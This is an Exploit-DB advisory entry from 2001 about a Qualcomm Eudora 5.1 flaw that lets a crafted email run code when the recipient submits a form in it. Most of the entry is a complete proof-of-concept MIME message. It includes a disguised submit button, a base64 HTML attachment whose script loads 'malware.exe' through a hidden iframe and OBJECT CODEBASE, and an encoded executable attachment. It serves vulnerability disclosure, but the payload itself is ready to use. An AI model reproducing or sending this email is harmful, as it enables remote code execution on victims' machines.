Qualcomm Eudora 5.1 - Hidden Attachment Execution

EDB-ID:

20888




Platform:

Windows

Date:

2001-05-29


source: https://www.securityfocus.com/bid/2796/info

Eudora is an email program for the Windows platform. Eudora contains a vulnerability which may make it possible for an attacker to excecute arbitrary code on a remote system even if 'allow executables in HTML content' is disabled, if the 'Use Microsoft viewer' option is enabled.

The attack can be carried out if the recipient of a maliciously crafted email 'submits' a form in the message.

This may lead to remote attackers gaining access to victim hosts.

** Eudora 5.1.1 is also stated as being vulnerable to this issue. The problem stems from Eudora not treating files with a '.MHTML' extension with caution. 

MIME-Version: 1.0
To: 
Subject: HEY!DORA
Content-Type: multipart/related;
 boundary="------------DB87F71CA55F5A135BFD6F03"


--------------DB87F71CA55F5A135BFD6F03
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
 <font color=#400040>To view the demo, please go here:</font><FORM action="cid:master.malware.com" method=post target=new><button  type=submit style="width:130pt;height:20pt;cursor:hand;background-color:transparent;border:0pt"><font color=#0000ff><u>http://www.malware.com</u></font></button> </FORM>
<img SRC="cid:master.malware.com" height=1 width=1><img SRC="cid:http://www.malware.com" height=1 width=1></html>

--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <master.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.html"

PGNlbnRlcj48Yj48Zm9udCAgY29sb3I9IiMwMDAwMDAiIGZhY2U9ImFyaWFsIj4gIDxoMT5t
YWx3YXJlLmNvbTwvaDE+PC9mb250PjwvYj48L2NlbnRlcj4NCg0KDQo8c2NyaXB0Pg0KLy8g
aHR0cDovL3d3dy5tYWx3YXJlLmNvbSAtIDE4LjAzLjAxDQpkb2N1bWVudC53cml0ZWxuKCc8
SUZSQU1FIElEPXJ1bm5lcndpbiBXSURUSD0wIEhFSUdIVD0wIFNSQz0iYWJvdXQ6Ymxhbmsi
PjwvSUZSQU1FPicpOw0KZnVuY3Rpb24gbGlua2l0KGZpbGVuYW1lKQ0Kew0KICAgc3RycGFn
ZXN0YXJ0ID0gIjxIVE1MPjxIRUFEPjwvSEVBRD48Qk9EWT48T0JKRUNUICAgQ0xBU1NJRD0i
ICsNCiAgICAgICInQ0xTSUQ6MTU1ODlGQTEtQzQ1Ni0xMUNFLUJGMDEtMDBBQTAwNTU1OTVB
JyBDT0RFQkFTRT0nIjsNCiAgIHN0cnBhZ2VlbmQgPSAiJz48L09CSkVDVD48L0JPRFk+PC9I
VE1MPiI7DQogICBydW5uZXJ3aW4uZG9jdW1lbnQub3BlbigpOw0KICAgcnVubmVyd2luLmRv
Y3VtZW50LndyaXRlKHN0cnBhZ2VzdGFydCArIGZpbGVuYW1lICsgc3RycGFnZWVuZCk7DQog
fQ0KbGlua2l0KCdtYWx3YXJlLmV4ZScpOw0KPC9zY3JpcHQ+
--------------DB87F71CA55F5A135BFD6F03
Content-Type: application/octet-stream
Content-ID: <http://www.malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="malware.exe"

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
AAARAAASAAATAAAUAAAVAAAWAAAXAAAYAAAZAAAaAAAbAAAcAAAdAAAeAAAfAAAgAAAhAAAi
AAAjAAAkAAAlAAAmAAAnAAAoAAApAAAqAAArAAAsAAAtAAAuAAAvAAAwAAAxAAAyAAAzAAA0
AAA1AAA2AAA3AAA4AAA5AAA6AAA7AAA8AAA9AAA+AAA/AAA/AAA/AAA/AQA/AgA/AwA/BAA/
BQA/BgA/BwA/CAA/CQA/CgA/CwA/DAA/DQA/DgA/DwA/EAA/EQA/EgA/EwA/FAA/FQA/FgA/
FwA/GAA/GQA/GgA/GwA/HAA/HQA/HgA/HwA/IAA/IQA/IgA/IwA/JAA/JQA/JgA/JwA/KAA/
KQA/KgA/KwA/LAA/LQA/LgA/LwA/MAA/MQA/MgA/MwA/NAA/NQA/NgA/NwA/OAA/OQA/OgA/
OwA/PAA/PQA/PgA/PwA/PwA/PwA/PwE/PwI/PwM/PwQ/PwU/PwY/Pwc/Pwg/Pwk/Pwo/Pws/
Pww/Pw0/Pw4/Pw8/PxA/PxE/PxI/PxM/PxQ/PxU/PxY/Pxc/Pxg/Pxk/Pxo/Pxs/Pxw/Px0/
Px4/Px8/PyA/PyE/PyI/PyM/PyQ/PyU/PyY/Pyc/Pyg/Pyk/Pyo/Pys/Pyw/Py0/Py4/Py8/
PzA/PzE/PzI/PzM/PzQ/PzU/PzY/Pzc/Pzg/Pzk/Pzo/Pzs/Pzw/Pz0/Pz4/Pz8/Pz8=
--------------DB87F71CA55F5A135BFD6F03--